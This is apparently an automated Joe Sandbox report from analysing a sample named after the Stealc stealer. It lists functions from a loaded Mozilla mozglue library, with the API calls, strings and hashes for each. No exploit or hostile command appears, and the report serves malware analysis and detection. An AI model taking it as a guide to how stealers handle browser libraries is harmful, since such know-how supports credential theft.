Part of subcall function 6BF8AB89: EnterCriticalSection.KERNEL32(6BFDE370,?,?,?,6BF534DE,6BFDF6CC,?,?,?,?,?,?,?,6BF53284), ref: 6BF8AB94
Part of subcall function 6BF8AB89: LeaveCriticalSection.KERNEL32(6BFDE370,?,6BF534DE,6BFDF6CC,?,?,?,?,?,?,?,6BF53284,?,?,6BF756F6), ref: 6BF8ABD1

__aulldiv.LIBCMT ref: 6BF5346B

Strings

QueryInterruptTime, xrefs: 6BF53230
KernelBase.dll, xrefs: 6BF53212

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 2ac14c42c1e72a07c1e36c7ef298ef7193f481b151222c53db55348643ebbf7e
Instruction ID: d4fc9eb4fe11ea8a67a6674fef2d8fae7ae86585f69acbf38e44359a1706bb33
Opcode Fuzzy Hash: 2ac14c42c1e72a07c1e36c7ef298ef7193f481b151222c53db55348643ebbf7e
Instruction Fuzzy Hash: 7661E2729187018BC721CF38C45175AB3E5FFC6350F218B1DE8A5A32B1EB35E5598B42

Function 6BF63A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6BF63BB4
ReleaseSRWLockShared.KERNEL32 ref: 6BF63BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6BF63BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6BF63C91
ReleaseSRWLockShared.KERNEL32 ref: 6BF63CBD
moz_xmalloc.MOZGLUE ref: 6BF63CF1

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 3acfae6143ebd7600cc91d338648d8f258c78222aca605cc6988edff9a9fbe68
Instruction ID: a10c7dc962baedb4902344952af34aecfeca990db27e2d14d0e0fc427f209b60
Opcode Fuzzy Hash: 3acfae6143ebd7600cc91d338648d8f258c78222aca605cc6988edff9a9fbe68
Instruction Fuzzy Hash: 77C15EB29047418FC724DF28C08465AFBF1FF89344F158A9ED8998B365E775E885CB82

Function 6BF9EB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF9EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BF9EBAC

Part of subcall function 6BF994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BF994EE
Part of subcall function 6BF994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BF99508

GetCurrentThreadId.KERNEL32 ref: 6BF9EBC1
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8,?,?,00000000), ref: 6BF9EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BF9EBE5
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8,00000000), ref: 6BF9EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BF9EC46
CloseHandle.KERNEL32(?), ref: 6BF9EC55
free.MOZGLUE(00000000), ref: 6BF9EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BF9EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BF9EA9B

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: fa2f1b5542303ccea56cc8886cf9c536b2c94791ebdf7428e54454312d8911a8
Instruction ID: f0ddc833b668cc921fd40d3c3f1c63ede2052c311ebc8f8c2c388db4aec99f3e
Opcode Fuzzy Hash: fa2f1b5542303ccea56cc8886cf9c536b2c94791ebdf7428e54454312d8911a8
Instruction Fuzzy Hash: 51112433810105AFDF006F74E849F5A7765FF86328F048224FD1997261DB39D808CBA1

Function 6BF8F2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF8D9DB), ref: 6BF8F2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BF8F2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BF8F386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BF8F347

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BF8F3C8
free.MOZGLUE(00000000,00000000), ref: 6BF8F3F3
free.MOZGLUE(00000000,00000000), ref: 6BF8F3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6BF8F413

Strings

ntdll.dll, xrefs: 6BF8F2F0

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: 643431d16d813e2c5a46e61a7777e83d29906691c47f97137b27cbcc6cefd4ac
Instruction ID: 5f47f4c4ba285dbc63eae376bd6aa5cf8c9c2def9a1402060e40daf6ec245cc2
Opcode Fuzzy Hash: 643431d16d813e2c5a46e61a7777e83d29906691c47f97137b27cbcc6cefd4ac
Instruction Fuzzy Hash: 9E41FFB3E002058FDF448F38E846B9AB7B4EF85354F10482DD85AA73A0EB38E524C681

Function 6BFB6A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6BFDF618), ref: 6BFB6A68
GetCurrentProcess.KERNEL32 ref: 6BFB6A7D
GetCurrentProcess.KERNEL32 ref: 6BFB6AA1
EnterCriticalSection.KERNEL32(6BFDF618), ref: 6BFB6AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BFB6AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BFB6B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6BFB6B65
LeaveCriticalSection.KERNEL32(6BFDF618,?,?), ref: 6BFB6B83

Strings

SymInitialize, xrefs: 6BFB6BA3

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 3ac6f7dcfb92fc294651bc5f423690d52e910d686a648df44419d17a69e88f0f
Instruction ID: 117308d1d452512ab84b94bb0b5cc3967d8aa0bfccb6353cacd878a5d53f7d9e
Opcode Fuzzy Hash: 3ac6f7dcfb92fc294651bc5f423690d52e910d686a648df44419d17a69e88f0f
Instruction Fuzzy Hash: 01418072614345AFDF01DF74C889B9A7BA8EF86304F088479FD48CB2A2DB759508CB61

Function 6BF9DBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF9DBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF9DBE9

Part of subcall function 6BF994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BF994EE
Part of subcall function 6BF994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BF99508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BF9DC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BF9DC7F

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

Part of subcall function 6BF99A60: GetCurrentThreadId.KERNEL32 ref: 6BF99A95
Part of subcall function 6BF99A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF99A9D
Part of subcall function 6BF99A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BF99ACC
Part of subcall function 6BF99A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF99BA7
Part of subcall function 6BF99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BF99BB8
Part of subcall function 6BF99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BF99BC9

Part of subcall function 6BF9E8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BF9DCF5), ref: 6BF9E92D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF9DD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF9DD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF9DD58

Part of subcall function 6BF8CBE8: GetCurrentProcess.KERNEL32(?,6BF531A7), ref: 6BF8CBF1
Part of subcall function 6BF8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BF531A7), ref: 6BF8CBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BF9DBF2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 3378208378-1387374313
Opcode ID: 35351afc247ff7dddaeb8e27ba48d3d06197ac306d62296d2d6d67e7553d445d
Instruction ID: 931acfa7821c4a5f675d1e284b8c0ddee39942631724820617d17e5de2692089
Opcode Fuzzy Hash: 35351afc247ff7dddaeb8e27ba48d3d06197ac306d62296d2d6d67e7553d445d
Instruction Fuzzy Hash: 5781E27A6007018FDB24EF38D485A6AF7E1FF89308F20892DD85687761DB38E949CB51

Function 6BF548E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6BF9483A,?), ref: 6BF54ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6BF9483A,?), ref: 6BF54AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6BF9483A,?), ref: 6BF54A82

Part of subcall function 6BF6CA10: mozalloc_abort.MOZGLUE(?), ref: 6BF6CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6BF9483A,?), ref: 6BF54A97
moz_xmalloc.MOZGLUE(15D4E801,?,6BF9483A,?), ref: 6BF54A35

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6BF9483A,?), ref: 6BF54A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6BF9483A,?), ref: 6BF54AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6BF9483A,?), ref: 6BF54B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6BF9483A,?), ref: 6BF54B2C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: fb5f260e5e487bc550f4251c7d8ed8e36dd3703ff34622e0e3c557fdf40984a5
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: B47169B29007469FCB54CF78C4819AAB7F5FF18308B10463ED15ACBA61E735E665CB80

Function 6BFAAB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BFAABB4
AcquireSRWLockExclusive.KERNEL32(6BF64A63), ref: 6BFAABC0
ReleaseSRWLockExclusive.KERNEL32 ref: 6BFAAC06
GetCurrentThreadId.KERNEL32 ref: 6BFAAC16
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BFAAC27
ReleaseSRWLockExclusive.KERNEL32 ref: 6BFAAC66
free.MOZGLUE(?), ref: 6BFAAD19
free.MOZGLUE(00000000), ref: 6BFAAD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6BFAAD38

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: 88ae92153daa66a459e79f5c2330abc13951067f6979200f97b256c3f76a5fe5
Instruction ID: c9b1d8255be918cc10fbcc6600d3524ab687cb36e4e7cc42784890042a9d8268
Opcode Fuzzy Hash: 88ae92153daa66a459e79f5c2330abc13951067f6979200f97b256c3f76a5fe5
Instruction Fuzzy Hash: 30513576600B02CFD7248F35C488756B7E6BF89314F104A2DD5AA87761EB75E848CB51

Function 6BFACB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACBE9
std::_Facet_Register.LIBCPMT ref: 6BFACBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6BFABCAE,?,?,6BF9DC2C), ref: 6BFACC65

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: fb3f010781b232bdc70460bc98c02209e6f8fb27b038e579935d71b5fec5f69b
Instruction ID: 5b62a14ba2ddbd098f9db03787fdc4b94547098736dd728d0dba68203145bf97
Opcode Fuzzy Hash: fb3f010781b232bdc70460bc98c02209e6f8fb27b038e579935d71b5fec5f69b
Instruction Fuzzy Hash: 1641B332A00209CFCB04DF75CC99B6E77B6EF89750F044468D50A9B3A2DB39E845CB91

Function 6BF5BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6BF5BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6BF5BD06

Strings

0, xrefs: 6BF5BBCD
y, xrefs: 6BF5BC4E
0, xrefs: 6BF5BC74

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 6a46f66a91d0fc28ed207967742901b67a3c85c2ad92f7a94fee2016a15150dc
Instruction ID: 6cfd63e0421a04e4297540b1288f379ea397b263b97a92916038afdb7731f92a
Opcode Fuzzy Hash: 6a46f66a91d0fc28ed207967742901b67a3c85c2ad92f7a94fee2016a15150dc
Instruction Fuzzy Hash: 1961E073A087059FC700CF38C48565BB7E5AF9A344F004A6EE88997262DB38D969C782

Function 6BF60A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6BFBB80C,00000000,?,?,6BF6003B,?), ref: 6BF60A72

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

moz_xmalloc.MOZGLUE(?,?,6BFBB80C,00000000,?,?,6BF6003B,?), ref: 6BF60AF5
free.MOZGLUE(00000000,?,?,6BFBB80C,00000000,?,?,6BF6003B,?), ref: 6BF60B9F
free.MOZGLUE(?,?,?,6BFBB80C,00000000,?,?,6BF6003B,?), ref: 6BF60BDB
free.MOZGLUE(00000000,?,?,6BFBB80C,00000000,?,?,6BF6003B,?), ref: 6BF60BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6BFBB80C,00000000,?,?,6BF6003B,?), ref: 6BF60C0A

Strings

alloc overflow, xrefs: 6BF60C05

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 42ff2f1501384e7530477c59e8a3a68babf4438cfbb95a64d8014bc4ffbaa4f9
Instruction ID: 0228f219616d61ea29a69c9441786cfb636302d1aa3dd9bf970e436b66d2c7eb
Opcode Fuzzy Hash: 42ff2f1501384e7530477c59e8a3a68babf4438cfbb95a64d8014bc4ffbaa4f9
Instruction Fuzzy Hash: 7251B372A002068FDB24CF28C8C0A5EF3B6FF44388F24896DC85ADB211FBB5A554CB51

Function 6BF578C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6BFD008B), ref: 6BF57B89
free.MOZGLUE(?,6BFD008B), ref: 6BF57BAC

Part of subcall function 6BF578C0: free.MOZGLUE(?,6BFD008B), ref: 6BF57BCF

free.MOZGLUE(?,6BFD008B), ref: 6BF57BF2

Part of subcall function 6BF75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BF75EDB
Part of subcall function 6BF75E90: memset.VCRUNTIME140(6BFB7765,000000E5,55CCCCCC), ref: 6BF75F27
Part of subcall function 6BF75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BF75FB2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 523d7bb759d1d052e89c8cd1ef8b5d1b012cf859d417313568b49f4ad892c52d
Instruction ID: 712517458a9db52fab237c8dc2851705f948f78d1def02290b886534bbf000bd
Opcode Fuzzy Hash: 523d7bb759d1d052e89c8cd1ef8b5d1b012cf859d417313568b49f4ad892c52d
Instruction Fuzzy Hash: E0C10573E011298BEB24CB28CC94B9DB772BF51314F1082E9D51AAB3E1D7399E948F51

Function 6BFA1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BFA124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BFA1268
GetCurrentThreadId.KERNEL32 ref: 6BFA12DA
InitializeConditionVariable.KERNEL32(?), ref: 6BFA134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6BFA138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6BFA1431

Part of subcall function 6BF98AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BFB1563), ref: 6BF98BD5

free.MOZGLUE(?), ref: 6BFA145A
